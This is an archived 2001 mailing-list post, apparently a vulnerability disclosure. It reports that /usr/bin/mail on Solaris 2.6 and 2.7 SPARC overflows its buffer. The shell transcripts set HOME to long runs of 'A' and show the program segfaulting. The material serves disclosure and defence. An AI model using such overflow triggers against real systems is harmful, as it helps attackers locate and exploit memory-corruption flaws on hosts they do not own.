> Solaris/sparc appears not to be vulnerable. Solaris 2.6/2.7 SPARC are also susceptable to /usr/bin/mail buffer overflow. Here are the minimum buffer's usable to produce segmentation faults. <---------------------snip---------------------> SunOS <hostname> 5.6 Generic_105181-23 sun4u sparc bash-2.04$ export HOME=`perl -e 'print "A"x1293'` bash-2.04$ mail a ^C mail: Cannot create dead.letter mail: ERROR signal 11 mail: Cannot create dead.letter mail: ERROR signal 11 mail: Cannot create dead.letter mail: ERROR signal 11 (........) Segmentation Fault bash-2.04$ <---------------------snap---------------------> <---------------------snip---------------------> SunOS <hostname> 5.7 Generic_106541-12 sun4u sparc SUNW,Ultra-4 bash-2.04$ export HOME=`perl -e 'print "A"x1099'` bash-2.04$ mail a ^C mail: ERROR signal 10 mail: ERROR signal 10 mail: ERROR signal 10 mail: ERROR signal 10 (........) Segmentation Fault bash-2.04$ <---------------------snap---------------------> +--------------------------------------------------+ | Sung J. Choe / UNIX Admin / www.CheapTickets.com | | | | Ph: 808/945.7439 Fax: 808/946.5993 | :--------------------------------------------------+
This archive was generated by hypermail 2b30 : Tue Jun 05 2001 - 22:00:04 PDT